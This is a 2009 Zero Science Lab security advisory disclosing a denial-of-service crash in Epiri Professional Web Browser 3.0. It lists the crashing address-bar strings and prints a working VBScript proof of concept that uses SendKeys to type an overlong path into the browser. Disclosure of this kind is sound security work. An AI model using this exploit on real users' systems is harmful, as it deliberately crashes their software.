Title: Epiri Professional Web Browser 3.0 Remote Crash Exploit
Advisory ID: ZSL-2009-4923
Release Date: 30.07.2009
Epiri Professional 3.0 next generation alternative internet Epiri Professional features with faster internet, digital clarity, the latest technological design and user-focused, impressive, next generation alternative internet program. Microsoft Silverlight needed.
Epiri Professional Web Browser suffers from a denial of service vulnerability that crashes the application by typiing one of the 3 vulnerable strings into the address bar ('file://', 'C::' and 'C:AAAA..AAA) or by opening a malicious .vbs script file localy or remotely. Vulnerable Mode: Browse Internet.
Horizon Software Co. - <http://www.horizonum.com>
Microsoft Windows XP Professional SP3 (English)
[30.07.2009] - Initial release
Zero Science Lab
' Title: Epiri Professional Web Browser 3.0 Remote Crash Exploit ' Vendor: Horizon ' Product Web Page: http://www.horizonum.com/ ' Current Version: 3.0.0.00 ' Notiz: Microsoft Silverlight ' Vulnerable Mode: Browse Internet ' Tested On Microsoft Windows XP Professional SP3 (En) ' Vulnerable strings: ' file:// ' C:: ' C:\AAAA...AAAA  ' ' Vulnerability Discovered By Gjoko 'LiquidWorm' Krstic ' liquidworm gmail com ' http://www.zeroscience.org/ ' 28.07.2009 ' Working PoC: http://zeroscience.org/codes/epiri_crash.vbs Dim crash Set crash = CreateObject("WScript.Shell") With crash Do Until Success = True Success = crash.AppActivate("Epiri Professional 3.0") Loop '.SendKeys "file://" '.SendKeys "C::" .SendKeys "C:\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .SendKeys "~" 'Return End With Wscript.Quit